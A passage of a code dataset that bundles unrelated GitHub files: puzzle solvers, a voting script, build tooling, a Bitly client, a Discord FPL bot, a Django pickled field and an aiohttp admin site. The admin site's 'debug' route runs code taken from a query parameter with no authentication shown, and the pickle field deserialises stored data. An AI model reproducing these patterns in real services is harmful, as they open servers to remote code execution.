\"):\n signal = set(signal)\n possible_nums = signal_length[len(signal)]\n\n for pos in position:\n if possible_nums.issubset(position[pos]):\n if possible.get(pos) is None: possible[pos] = signal\n else: possible[pos] = signal.intersection(possible[pos])\n\n # now good enough? lol\n while (sum([len(set) for set in possible.values()])) > 7:\n for v in filter(lambda s: len(s) == 1, possible.values()):\n pos = list(v)[0]\n for other_v in filter(lambda s: len(s) > 1, possible.values()):\n other_v.discard(pos)\n\n wire_mapping = {}\n\n for i in range(0, 10):\n letters = []\n for letter in position:\n if i in position[letter]:\n letters.append(letter)\n\n for j in range(len(letters)):\n letters[j] = list(possible[letters[j]])[0]\n\n word = ''.join(sorted(letters))\n wire_mapping[word] = i\n\n digits = ''\n for signal in line[1].split(\" \"):\n num = wire_mapping[''.join(sorted(signal))]\n digits += str(num)\n\n total += int(digits)\n\nprint(\"total:\", total)\n","repo_name":"ericpretzel/advent-of-code","sub_path":"2021/day08/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71475088169","text":"partidoA = []\npartidoB = []\npartidoC = []\n\ndef urna():\n while True:\n inicial = input(\"Urna Eletrônica\\nPartidoA [10]\\nPartidoB [11]\\nPartidoC [12]\\nSelecione o número do partido (0 para sair): \")\n\n if inicial == '10':\n candidatoA = input(\"Você escolheu o PartidoA. Digite '1' para confirmar o voto ou '0' para voltar ao início: \")\n\n if candidatoA == '1':\n print(\"Voto confirmado com sucesso\")\n voto = 1\n partidoA.append(voto)\n print(partidoA)\n\n elif inicial == '11':\n candidatoB = input(\"Você escolheu o PartidoB. Digite '1' para confirmar o voto ou '0' para voltar ao início: \")\n\n if candidatoB == '1':\n print(\"Voto confirmado com sucesso\")\n voto = 1\n partidoB.append(voto)\n print(partidoB)\n\n elif inicial == '12':\n candidatoC = input(\"Você escolheu o PartidoC. 
Digite '1' para confirmar o voto ou '0' para voltar ao início: \")\n\n if candidatoC == '1':\n print('Voto confirmado com sucesso')\n voto = 1\n partidoC.append(voto)\n print(partidoC)\n\n elif inicial == '0':\n break\n\n if sum(partidoA) == 20:\n print(\"PartidoA venceu as eleições!\")\n break\n\n elif sum(partidoB) == 20:\n print(\"PartidoB venceu as eleições!\")\n break\n\n elif sum(partidoC) == 20:\n print(\"PartidoC venceu as eleições!\")\n break\n\nurna()\n","repo_name":"lucascampos04/Urna","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72529438568","text":"\"\"\"\nFork of setuptools' install_lib command that installs the native\njep library, the jar file, and the python files to the\ninstall_dir + 'jep', typically site-packages/jep.\n\"\"\"\n\nfrom commands.util import is_osx\nfrom commands.util import is_windows\nfrom commands.link_util import link_native_lib\nfrom commands.python import get_python_lib_dir\nfrom setuptools.command.install_lib import install_lib\nimport os\n\n\nclass jep_install(install_lib):\n\n def install(self):\n build_ext = self.get_finalized_command('build_ext')\n jep_built_path = build_ext.get_outputs()[0]\n version = self.distribution.metadata.get_version()\n\n if os.path.isdir(self.build_dir):\n jep_install_dir = os.path.join(self.install_dir, 'jep')\n if not os.path.exists(jep_install_dir):\n os.makedirs(jep_install_dir)\n\n # let's put the native lib in site-packages/jep where it belongs\n lib_copied = self.copy_file(\n jep_built_path,\n os.path.join(jep_install_dir, os.path.basename(jep_built_path)))\n\n # let's copy the jar file too\n jar_name = 'jep-{0}.jar'.format(version)\n jar_copied = self.copy_file(\n os.path.join('build', 'java', jar_name),\n os.path.join(jep_install_dir, jar_name))\n\n # let's copy the jep package to site-packages\n py_copied = self.copy_tree(\n os.path.join(self.build_dir, 'jep'),\n jep_install_dir)\n\n # now let's give it a link that works for Java\n # System.loadLibrary(\"jep\")\n link_native_lib(jep_install_dir, jep_built_path)\n else:\n self.warn(\"'%s' does not exist -- no Python modules to install\" %\n self.build_dir)\n return\n","repo_name":"ninia/jep","sub_path":"commands/install_lib.py","file_name":"install_lib.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":1185,"dataset":"github-code","pt":"53"} +{"seq_id":"34859323960","text":"import re\n\nfrom stringfinder.reference_finder import ReferenceFinder\n\n\n# --need to consider whether to create a module or an article from the php code\ndef conversion_format_detector(file_name_list):\n file_details = []\n for file_name in file_name_list:\n with open(file_name, \"r\") as altered_source:\n source = altered_source.read()\n source = source.replace(\"\\n\", \" \")\n\n ref = ReferenceFinder()\n php_occurrences = ref.get_php_occurrences(source)\n\n # --if there is a html header, get the count of the header part of the file\n if re.findall('', source).__len__() > 0:\n header = re.findall('(.*?)', source)\n header_length = len('') + len(header[0])\n elif re.findall('', source).__len__() > 0:\n header = re.findall('((.*?))', source)\n header_length = len('') + len(header[0])\n else:\n header_length = 0\n\n file_length = source.__len__()\n\n # --get the total length of php codes\n total_php_length = 0\n for occurrence in php_occurrences:\n total_php_length = total_php_length + 
len(occurrence) + len(\"\")\n\n # --check whether the file contains a html header\n if header_length > 0:\n total_php_length = total_php_length + len(\"\")\n\n # --check whether the file contains more than php codes\n # print(file_length - header_length)\n # print(total_php_length)\n\n if file_length - header_length > total_php_length:\n file_details.append(\"article : \" + file_name)\n else:\n file_details.append(\"separate : \" + file_name)\n return file_details\n\n# --not completed yet\n# conversion_format_detector(file_name_list=[\n# \"/home/shan/Developments/Projects/research-devs/Blog/User/post/post_image_edit.php\"])\n","repo_name":"ShanChathusanda93/python-devs","sub_path":"filehandler/FileParser.py","file_name":"FileParser.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11874597441","text":"\"\"\"\nMonitors our code & docs for changes\n\"\"\"\nimport os\nimport sys\nimport subprocess\nimport datetime\nimport time\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nBASEDIR = os.path.abspath(os.path.dirname(__file__))\n\ndef get_now():\n \"Get the current date and time as a string\"\n return datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")\n\ndef build_docs():\n \"\"\"\n Run the Sphinx build (`make html`) to make sure we have the\n latest version of the docs\n \"\"\"\n\n print >> sys.stderr, \"Building docs at %s\" % get_now()\n os.chdir(os.path.join(BASEDIR, \"docs\"))\n subprocess.call(r'make.bat html')\n\ndef run_tests():\n \"Run unit tests with unittest.\"\n\n print >> sys.stderr, \"Running unit tests at %s\" % get_now()\n os.chdir(BASEDIR)\n subprocess.call(r'python -m unittest discover -b')\n\ndef getext(filename):\n \"Get the file extension.\"\n\n return os.path.splitext(filename)[-1].lower()\n\nclass ChangeHandler(FileSystemEventHandler):\n \"\"\"\n React to changes in Python and Rest files by\n running unit tests (Python) or building docs (.rst)\n \"\"\"\n\n def on_any_event(self, event):\n \"If any file or folder is changed\"\n\n if event.is_directory:\n return\n if getext(event.src_path) == '.py':\n run_tests()\n elif getext(event.src_path) == '.rst':\n build_docs()\n\ndef main():\n \"\"\"\n Called when run as main.\n Look for changes to code and doc files.\n \"\"\"\n\n while 1:\n \n event_handler = ChangeHandler()\n observer = Observer()\n observer.schedule(event_handler, BASEDIR, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Arup/jobSearchBot","sub_path":"monitorChanges.py","file_name":"monitorChanges.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3976555757","text":"import os\nimport requests\nfrom urllib.parse import urlparse\nfrom dotenv import load_dotenv\nimport argparse\n\n\ndef shorten_link(link, token):\n url = 'https://api-ssl.bitly.com/v4/shorten'\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n payload = {\n \"long_url\": link\n }\n\n response = requests.post(url, headers=headers, json=payload)\n response.raise_for_status()\n return response.json()[\"link\"]\n\n\ndef count_clicks(link, token):\n parsed_url = urlparse(link)\n url_without_scheme = f\"{parsed_url.netloc}/{parsed_url.path}\"\n\n url = 
f'https://api-ssl.bitly.com/v4/bitlinks/{url_without_scheme}/clicks/summary'\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return response.json()['total_clicks']\n\n\ndef is_bitlink(link, token):\n parsed_url = urlparse(link)\n url_without_scheme = f\"{parsed_url.netloc}/{parsed_url.path}\"\n\n url = f'https://api-ssl.bitly.com/v4/bitlinks/{url_without_scheme}'\n headers = {\n 'Authorization': f'Bearer {token}'\n }\n\n response = requests.get(url, headers=headers)\n return response.ok\n\n\nif __name__ == '__main__':\n load_dotenv()\n token = os.environ['BITLY_TOKEN']\n parser = argparse.ArgumentParser(\n description='сокращаят ссылки и считает клики'\n )\n parser.add_argument('link', help='ваша ссылка')\n args = parser.parse_args()\n user_url = args.link\n try:\n if is_bitlink(user_url, token):\n clicks_count = count_clicks(user_url, token)\n print(clicks_count)\n else:\n bitlink = shorten_link(user_url, token)\n print(bitlink)\n except requests.exceptions.HTTPError:\n print(\"ошибка неверная ссылка\")","repo_name":"KirillKTA/BITLY","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71873436327","text":"import asyncio\nimport json\nfrom copy import deepcopy\nfrom datetime import timedelta\nfrom email.mime.multipart import MIMEMultipart\nfrom typing import TYPE_CHECKING\n\nfrom aiohttp import web\n\nimport HaloNet\n\nfrom Core.ConfigSystem.AppsConfig import SiteConfigBase\nfrom Core.Framework import *\nfrom Types import FOnlineStatisticEntry\n\nif TYPE_CHECKING:\n from BaseApp import BaseApp\n\nfrom Core.SiteUtils import route, web_run_app, from_file\nfrom Core.Type import TypeBase\nfrom Core.Utils import PyCharm_go_to, UnrealEngine4_go_to\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\n\n@runnable\nclass Site(Service):\n config: SiteConfigBase\n\n async def start(self):\n from Supervisor import Supervisor\n self.sv = await self.get_single_service(\"Supervisor\")\n self.base: 'BaseApp' = await self.sv.RequestService(\"BaseApp\")\n self.supervisor: Supervisor = await make_default_service_mailbox(\"Supervisor\")\n\n self.web_app = web.Application(loop=asyncio.get_event_loop())\n\n for r in self.__routes__:\n self.web_app.router.add_route(r['method_type'], r['path'], getattr(self, r['method']))\n\n self.web_app.router.add_static('/static/', f\"{Globals.workspace}/Services/{self.__class__.__name__}/static\",\n show_index=True,\n follow_symlinks=True)\n # self.web_init()\n\n if self.smtp_used:\n self.smtp = smtplib.SMTP(self.config.SMTP.Server)\n self.smtp.ehlo()\n self.smtp.starttls()\n self.smtp.login(self.config.SMTP.Source.login, self.config.SMTP.Source.password)\n else:\n self.smtp = None\n\n\n self.srv, self.srv_handler = await web_run_app(self.web_app,\n host=self.config.RoutingEndpoint[0],\n port=self.config.RoutingEndpoint[1],\n print=INFO_MSG)\n\n def __adel__(self):\n if self.smtp:\n self.smtp.quit()\n\n @property\n def smtp_used(self):\n return self.config.SMTP.Use\n\n @route(route_path='/')\n async def index(self, req: web.Request):\n return dict(BASE_ACTIVE=is_valid(self.base))\n\n # @route()\n # async def reg(self, req: web.Request):\n # if is_valid(self.base):\n # query = req.rel_url.query\n # if query.get('act', None) == 'reg':\n # username = query.get('username', None)\n # mail = query.get('mail', None)\n # password = 
query.get('password', None)\n # if username and password and mail:\n #\n # try:\n # success, user_id, digest = await asyncio.wait_for( self.base.RegisterUser(username, mail, password, self.smtp_used), 5 )\n #\n # if digest and self.smtp:\n #\n # data = from_file(\"Site/mail_template.html\", **dict(\n # ADDRESS=f\"http://{self.config.RoutingEndpoint[0]}:{self.config.RoutingEndpoint[1]}/reg?act=confirm&digest={digest}\"\n # )).decode()\n #\n # msg = MIMEMultipart('alternative')\n # msg['Subject'] = \"HaloNetExample\"\n # msg['From'] = self.config.SMTP.Source.mail\n # msg['To'] = mail\n #\n # part1 = MIMEText('Hello!', 'plain')\n # part2 = MIMEText(data, 'html')\n # msg.attach(part1)\n # msg.attach(part2)\n #\n # self.smtp.sendmail(self.config.SMTP.Source.mail, [mail], msg.as_string())\n #\n # return dict(BASE_ACTIVE=is_valid(self.base),\n # DONE_DATA={\n # \"success\": success,\n # \"username\": username,\n # \"user_id\": user_id\n # })\n # except asyncio.TimeoutError:\n # return dict(BASE_ACTIVE=is_valid(self.base),\n # TIMEOUT=True)\n # if query.get('act', None) == 'confirm':\n # digest = query.get('digest')\n # success, username = await asyncio.wait_for( self.base.ConfirmUser(digest, True), 5)\n # return dict(BASE_ACTIVE=is_valid(self.base),\n # CONFIRM_DATA={\n # \"success\": success,\n # \"username\": username,\n # })\n\n\n return dict(BASE_ACTIVE=is_valid(self.base), REG_WITH_MAIL=self.smtp_used)\n\n @route()\n async def dedicateds(self, req: web.Request):\n\n # servers_count = await self.supervisor.GetDedicatedServersCount()\n\n servers_info = await self.supervisor.GetDedicatedServersInfo()\n\n if is_valid(self.base):\n\n query = req.rel_url.query\n\n if query.get('act', None) == \"stop\":\n index = query.get('index', None)\n try:\n await asyncio.wait_for(self.supervisor.ShutdownDedicatedServer(int(index)), 5)\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base),\n SERVERS=[],\n TIMEOUT=True)\n\n if query.get('act', None) == \"reset\":\n index = query.get('index', None)\n try:\n await asyncio.wait_for(self.supervisor.ResetDedicatedServer(int(index)), 5)\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base),\n SERVERS=[],\n TIMEOUT=True)\n\n servers_info = await self.supervisor.GetDedicatedServersInfo()\n\n if query.get('act', None) == 'run':\n index = query.get('index', None)\n command = query.get('command', None)\n if index and command:\n try:\n await asyncio.wait_for(self.supervisor.ExecuteCommandOnDedicatedServer(int(index), command), 5)\n return dict(BASE_ACTIVE=is_valid(self.base),\n SERVERS=servers_info)\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base),\n SERVERS=servers_info,\n TIMEOUT=True)\n\n return dict(BASE_ACTIVE=is_valid(self.base), SERVERS=servers_info)\n\n @route()\n async def storages(self, req: web.Request):\n if is_valid(self.base):\n query = req.rel_url.query\n act = query.get('act', None)\n\n if act == 'reload':\n try:\n await asyncio.wait_for(self.base.ReloadStorages(), 5)\n return dict(BASE_ACTIVE=is_valid(self.base))\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base), TIMEOUT=True)\n if act == 'upload_configs':\n try:\n\n await asyncio.wait_for(self.base.UploadStoragesFromConfigs(), 5)\n return dict(SUCCESS=True, BASE_ACTIVE=is_valid(self.base))\n except asyncio.TimeoutError:\n return dict(BASE_ACTIVE=is_valid(self.base), TIMEOUT=True)\n\n if act == 'view':\n try:\n storage_info = None\n storage_list = await asyncio.wait_for(self.base.GetStorageNames(), 5)\n 
storage_name = query.get('storage', None)\n            if storage_name is not None:\n                storage_typename, storage_data = await asyncio.wait_for(self.base.GetStorageData(storage_name), 5)\n                T = TArray[TypeBase.find_type(storage_typename)]\n                ds = T.deserialize(storage_data)\n                self.interact_storage(ds)\n                storage_info = json.dumps(ds, indent=\"    \", separators=(\",\", \": \")).replace(\"\\n\", \"\u2028\").replace(\"^^\", '\"')\n                return dict(STORAGE_INFO=storage_info, BASE_ACTIVE=is_valid(self.base), STORAGES=storage_list)\n            except asyncio.TimeoutError:\n                return dict(BASE_ACTIVE=is_valid(self.base), TIMEOUT=True)\n\n        return dict(BASE_ACTIVE=is_valid(self.base))\n\n    def parse_asset(self, asset_path):\n        true_path = None\n        if asset_path.startswith(\"Blueprint'\") and asset_path.endswith(\"'\"):\n            true_path = asset_path[10:-1] + \"_C\"\n        elif asset_path.startswith(\"/Game\") and asset_path.endswith(\"_C\"):\n            true_path = asset_path\n\n        if true_path is not None:\n            return f\"\"\"{asset_path} \"\"\"\n        else:\n            return asset_path\n\n    def interact_storage(self, st_data):\n        if isinstance(st_data, list):\n            for i, entry in enumerate(st_data):\n                if isinstance(entry, (list, dict)):\n                    self.interact_storage(entry)\n                elif isinstance(entry, set):\n                    st_data[i] = list(entry)\n                elif isinstance(entry, str):\n                    st_data[i] = self.parse_asset(st_data[i])\n        elif isinstance(st_data, dict):\n            for key, value in st_data.items():\n                if isinstance(value, (list, dict)):\n                    self.interact_storage(value)\n                elif isinstance(value, set):\n                    st_data[key] = list(value)\n                elif isinstance(value, str):\n                    st_data[key] = self.parse_asset(st_data[key])\n\n    @route()\n    async def docs(self, req: web.Request):\n        query = req.rel_url.query\n        generated_info = deepcopy(ConfigurationGenerator().generated_info)\n\n        entities = dict()\n\n        types = deepcopy(ConfigurationGenerator().generated_types)\n\n        for entity_name, entity_info in generated_info.items():\n            if entity_name not in entities.keys():\n                entities[entity_name] = dict(context_data=dict())\n\n            for context_name, context_data in entity_info.items():\n                if context_name not in entities[entity_name]['context_data']:\n                    entities[entity_name]['context_data'][context_name] = context_data\n\n            additional_entity_info = dict()\n            additional_entity_info['Doc'] = None\n\n            if 'base' in entity_info:\n                additional_entity_info['Doc'] = entity_info['base']['Doc']\n            else:\n                additional_entity_info['Doc'] = list(entity_info.values())[0]['Doc']\n\n            additional_entity_info['ContextName'] = None\n            if len(entity_info) == 1 and list(entity_info.values())[0].get(\"IsApplication\", None):\n                additional_entity_info['ContextName'] = list(entity_info.keys())[0]\n\n            additional_entity_info['IsApp'] = len(entity_info) == 1 and list(entity_info.values())[0].get(\"IsApplication\", None)\n            additional_entity_info['IsExposedApp'] = len(entity_info) == 1 and list(entity_info.values())[0].get(\"Exposed\", None)\n\n            entities[entity_name].update({'additional': deepcopy(additional_entity_info)})\n\n        if query.get('cat', None) == 'entities':\n            return dict(ENTITIES=entities, BACK=True)\n\n        elif query.get('cat', None) == 'types':\n            return dict(TYPES=types, BACK=True)\n\n        elif query.get('act', None) == 'pycharm_goto':\n            PyCharm_go_to(query.get('filename', \"\"), query.get('linenumber', \"\"))\n            return dict()\n\n        elif query.get('act', None) == 'ue4_goto':\n            UnrealEngine4_go_to(query.get('asset', \"\"))\n            return dict()\n\n        entity = query.get('entity', None)\n        if entity is not None and entity in generated_info:\n            return dict(ENTITY=entities[entity], ENTITY_NAME=entity, BACK=True)\n\n        return dict(BROWSE_ALL=True)\n\n    @route()\n    async def debug(self, req: web.Request):\n        if is_valid(self.base):\n            query = req.rel_url.query\n            exec_code = query.get(\"exec\", None)  # renamed to avoid shadowing the built-in exec\n            result = \"\"\n            if exec_code is not None:\n                result = await self.base.ExecuteCode(exec_code)\n\n            entity_info = \"\"\n            if query.get('act', None) == \"view\":\n                entity_id = query.get('id', None)\n\n                action_name = query.get('action', None)\n                if action_name:\n                    await self.base.CallDisplayAction(entity_id, action_name)\n\n                if entity_id is not None:\n                    entity_info = await self.base.GetEntityViewInfo(entity_id)\n\n            debug_info = await self.base.GetDebugInfo()\n            return dict(BASE_ACTIVE=is_valid(self.base),\n                        ENTITIES=debug_info,\n                        RESULT=result,\n                        VIEW_STRUCTURE=entity_info)\n        return dict(BASE_ACTIVE=is_valid(self.base))\n\n    @route()\n    async def visor(self, req: web.Request):\n        if is_valid(self.supervisor):\n            query = req.rel_url.query\n            if query.get('act', None) == \"exec\":\n                cmd = query.get('cmd', None)\n                match_id = query.get('id', None)  # renamed to avoid shadowing the built-in id\n                if cmd and match_id:\n                    self.base.ExecuteMatchConsoleCommand(match_id, cmd)\n                else:\n                    WARN_MSG(\"Wrong query for 'exec'\")\n\n            if query.get('act', None) == \"test\":\n                try:\n                    await self.supervisor.minitest()\n                except Exception:\n                    WARN_MSG(\"supervisor minitest failed\")\n\n            states = await self.supervisor.GetBaseAppsGenericStatesInfo()\n            online: TArray[FOnlineStatisticEntry] = [] # await self.base.RequestOnline()\n\n            new_online = list()\n            last_online = None\n            for o in online:\n                if last_online is None:\n                    last_online = o\n                    new_online.append(last_online)\n\n                if o['Date'] - last_online['Date'] > timedelta(minutes=15):\n                    new_online.append(o)\n                    last_online = o\n                    continue\n\n                if o['OnlineCount'] > last_online['OnlineCount']:\n                    last_online['OnlineCount'] = o['OnlineCount']\n\n                if o['InGameCount'] > last_online['InGameCount']:\n                    last_online['InGameCount'] = o['InGameCount']\n\n            return dict(INFO=states, ONLINE=new_online)\n\n        return dict()\n","repo_name":"broly/HaloNet","sub_path":"HaloNet/Services/Site.py","file_name":"Site.py","file_ext":"py","file_size_in_byte":14974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"3242946963","text":"from Parcial.Clase import Transaccion\nimport json\n\ndef test_creacion_archivo():\n    transaccion_a = Transaccion(dni_cliente= \"45990339\", tipo_movimiento= \"CONSUMO\", monto_movimiento=2000, estado= \"RECHAZADO\", nombre_comercio= \"MUSIMUNDO\")\n    transaccion_b = Transaccion(dni_cliente= \"45990339\", tipo_movimiento= \"CONSUMO\", monto_movimiento=2000, estado= \"APROBADO\", nombre_comercio= \"MUSIMUNDO\")\n    transaccion_c = Transaccion(dni_cliente= \"30949303\", tipo_movimiento= \"CASH_IN\", monto_movimiento=50000, estado= \"APROBADO\", nombre_comercio= \"PAGOFACIL\")\n    transaccion_a.save_trans(transaccion_a)\n    transaccion_b.save_trans(transaccion_b)\n    transaccion_c.save_trans(transaccion_c)\n\ntest_creacion_archivo()\n\ndef test_monto_movimiento():\n    transaccion_a = Transaccion(dni_cliente= \"45990339\", tipo_movimiento= \"CONSUMO\", monto_movimiento= 200000, estado= \"APROBADO\", nombre_comercio= \"DISCO\")\n    transaccion_a.save_trans(transaccion_a)\n    transaccion_a.trans_mayor_100000()\n\ntest_monto_movimiento()\n\ndef test_json_movimiento():\n    transaccion_a = Transaccion(dni_cliente= \"30949303\", tipo_movimiento= \"CASH_IN\", monto_movimiento= 500, estado= \"APROBADO\", nombre_comercio= \"PAGOFACIL\")\n    to_dict = json.loads(transaccion_a.toJSON())\n\n    print(f\"\\n Las keys del diccionario son: {to_dict.keys()}\\n\"\n          f\"Los values del diccionario son: {to_dict.values()}\\n\"\n          f\"Los items del diccionario son: {dict(to_dict.items())}\\n\"\n          f\"El valor de la key de tipo de movimiento es: {to_dict.get('tipo_movimiento')}\")\n\n    for keys, values in to_dict.items():\n        print(keys, \":\", 
values)\n\ntest_json_movimiento()\n","repo_name":"NaguBianchi/ParcialIntegrador","sub_path":"Parcial/Metodos.py","file_name":"Metodos.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39532666296","text":"\"\"\" Provides a Django model field that automatically pickles Python objects.\n Copied from http://djangosnippets.org/snippets/1694/\n\"\"\"\n\nfrom logging import getLogger\nfrom copy import deepcopy\nfrom base64 import b64encode, b64decode\nfrom zlib import compress, decompress\nfrom ast import literal_eval\nfrom pickle import loads, dumps\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\n\nlog = getLogger('django-runtime-tags')\n\nclass PickledObject(str):\n \"\"\"\n A subclass of string so it can be told whether a string is a pickled\n object or not (if the object is an instance of this class then it must\n [well, should] be a pickled one).\n\n Only really useful for passing pre-encoded values to ``default``\n with ``dbsafe_encode``, not that doing so is necessary. If you\n remove PickledObject and its references, you won't be able to pass\n in pre-encoded values anymore, but you can always just pass in the\n python objects themselves.\n\n \"\"\"\n pass\n\ndef dbsafe_encode(value, compress_object=False):\n \"\"\"\n We use deepcopy() here to avoid a problem with cPickle, where dumps\n can generate different character streams for same lookup value if\n they are referenced differently.\n\n The reason this is important is because we do all of our lookups as\n simple string matches, thus the character streams must be the same\n for the lookups to work properly. See tests.py for more information.\n \"\"\"\n if not compress_object:\n value = b64encode(dumps(deepcopy(value)))\n else:\n value = b64encode(compress(dumps(deepcopy(value))))\n\n value = value.decode()\n\n return PickledObject(value)\n\ndef dbsafe_decode(value, compress_object=False):\n if not compress_object:\n value = loads(b64decode(value))\n else:\n value = loads(decompress(b64decode(value)))\n return value\n\nclass PickledObjectField(models.Field):\n \"\"\"\n A field that will accept *any* python object and store it in the\n database. PickledObjectField will optionally compress it's values if\n declared with the keyword argument ``compress=True``.\n\n Does not actually encode and compress ``None`` objects (although you\n can still do lookups using None). This way, it is still possible to\n use the ``isnull`` lookup type correctly. Because of this, the field\n defaults to ``null=True``, as otherwise it wouldn't be able to store\n None values since they aren't pickled and encoded.\n\n\n \"\"\"\n description = 'Any basic Python object can be pickled and stored'\n\n def __init__(self, *args, **kwargs):\n self.compress = kwargs.pop('compress', False)\n self.protocol = kwargs.pop('protocol', 2)\n self.convert = kwargs.pop('convert', False)\n #self.validators = kwargs.pop('validators', [])\n kwargs.setdefault('null', True)\n kwargs.setdefault('editable', False)\n\n super(PickledObjectField, self).__init__(*args, **kwargs)\n\n def get_default(self):\n \"\"\"\n Returns the default value for this field.\n\n The default implementation on models.Field calls force_unicode\n on the default, which means you can't set arbitrary Python\n objects as the default. To fix this, we just return the value\n without calling force_unicode on it. 
Note that if you set a\n        callable as a default, the field will still call it. It will\n        *not* try to pickle and encode it.\n\n        \"\"\"\n        if self.has_default():\n            if callable(self.default):\n                return self.default()\n            return self.default\n        # If the field doesn't have a default, then we punt to models.Field.\n        return super(PickledObjectField, self).get_default()\n\n    # Changed in Django 1.8:\n    # Historically, Django provided a metaclass called SubfieldBase which\n    # always called to_python() on assignment. This did not play nicely with\n    # custom database transformations, aggregation, or values queries, so it\n    # has been replaced with from_db_value().\n    def from_db_value(self, value, expression, connection):\n        return self.to_python(value)\n\n    def to_python(self, value):\n        \"\"\"\n        B64decode and unpickle the object, optionally decompressing it.\n\n        If an error is raised in de-pickling and we're sure the value is\n        a definite pickle, the error is allowed to propagate. If we\n        aren't sure if the value is a pickle or not, then we catch the\n        error and return the original value instead.\n\n        \"\"\"\n        if value is not None:\n            try:\n                value = dbsafe_decode(value, self.compress)\n            except Exception:\n                # If the value is a definite pickle and an error is raised in\n                # de-pickling, it should be allowed to propagate.\n                if isinstance(value, PickledObject):\n                    raise\n        return value\n\n    def validate(self, value, model_instance):\n        \"\"\" Catch this error here so it is handled correctly by the admin form.\n        The '__' can be used in eval exploits -- disallow it.\n        \"\"\"\n        if '__' in value:\n            raise ValidationError(\"'__' not allowed.\")\n\n    def get_db_prep_value(self, value, *args, **kwargs):\n        \"\"\"\n        Pickle and b64encode the object, optionally compressing it.\n\n        The pickling protocol is specified explicitly (by default 2),\n        rather than as -1 or HIGHEST_PROTOCOL, because we don't want the\n        protocol to change over time. If it did, ``exact`` and ``in``\n        lookups would likely fail, since pickle would now be generating\n        a different string.\n\n        \"\"\"\n        if value is not None and not isinstance(value, PickledObject):\n            # We call force_unicode here explicitly, so that the encoded string\n            # isn't rejected by the postgresql_psycopg2 backend. 
Alternatively,\n # we could have just registered PickledObject with the psycopg\n # marshaller (telling it to store it like it would a string), but\n # since both of these methods result in the same value being stored,\n # doing things this way is much easier.\n if self.convert:\n value = self.value_convert(value)\n value = dbsafe_encode(value, self.compress)\n return value\n\n def value_convert(self, value):\n \"\"\" Convert value from string to Python type, if possible.\n Nasty encoding issues, make sure to test values with\n non-ASCII characters!\n \"\"\"\n if isinstance(value, str):\n try:\n if value.lower() in ('true', 't'): value = 'True'\n elif value.lower() in ('false', 'f'): value = 'False'\n try:\n value = literal_eval(value)\n except (ValueError, SyntaxError) as e:\n log.warn('{}, {}'.format(value, e))\n value = \"'%s'\" % value.replace(\"'\", \"\\\\'\")\n try:\n value = literal_eval(value)\n except SyntaxError as e:\n log.error(e)\n raise ValidationError(str(e))\n return value\n except:\n raise\n return value\n\n def value_to_string(self, obj):\n value = self.value_from_object(obj)\n return self.get_db_prep_value(value)\n\n def get_internal_type(self):\n return 'TextField'\n\n def get_db_prep_lookup(self, lookup_type, value):\n if lookup_type not in ['exact', 'in', 'isnull']:\n raise TypeError('Lookup type %s is not supported.' % lookup_type)\n # The Field model already calls get_db_prep_value before doing the\n # actual lookup, so all we need to do is limit the lookup types.\n return super(PickledObjectField, self).get_db_prep_lookup(lookup_type, value)\n","repo_name":"burningmantech/django-runtime-tags","sub_path":"django_runtime_tags/pickled_object_field.py","file_name":"pickled_object_field.py","file_ext":"py","file_size_in_byte":7872,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"8880909893","text":"from fpl import FPL\nimport os\nimport discord\nfrom discord.ext import commands, tasks\nfrom dotenv import load_dotenv\nimport aiohttp\n\nload_dotenv()\nTOKEN = os.getenv('TOKEN')\n\nasync def get_current_gameweek(fpl_session):\n gameweek_data = await fpl_session.get_gameweeks(return_json=True)\n for gameweek in gameweek_data:\n if gameweek['is_current']:\n return gameweek['id']\n\nasync def get_team_details(fpl_session, picks):\n string = \"```\"\n point_sum = 0\n for player in picks:\n if player['multiplier'] > 0:\n p = await fpl_session.get_player(player['element'])\n points = p.event_points * player['multiplier']\n point_sum += points \n name = p.web_name\n if player['is_captain']:\n name += ' (C)'\n elif player['is_vice_captain']:\n name += ' (VC)'\n string += f'{name}: {points} \\n'\n string += 'Bench:\\n'\n for player in picks:\n if player['multiplier'] == 0:\n p = await fpl_session.get_player(player['element'])\n points = p.event_points * player['multiplier']\n name = p.web_name\n string += f'{name}: {points} \\n'\n string += f\"Total Points: {point_sum}```\"\n return string\n\nbot = commands.Bot(command_prefix='-')\n\n@bot.event\nasync def on_ready():\n print(\"Logged In\")\n\n\n@bot.command(name='get_team')\nasync def get_player_team(ctx, player_id: int):\n async with aiohttp.ClientSession() as session:\n fpl = FPL(session)\n gameweek = await get_current_gameweek(fpl)\n await 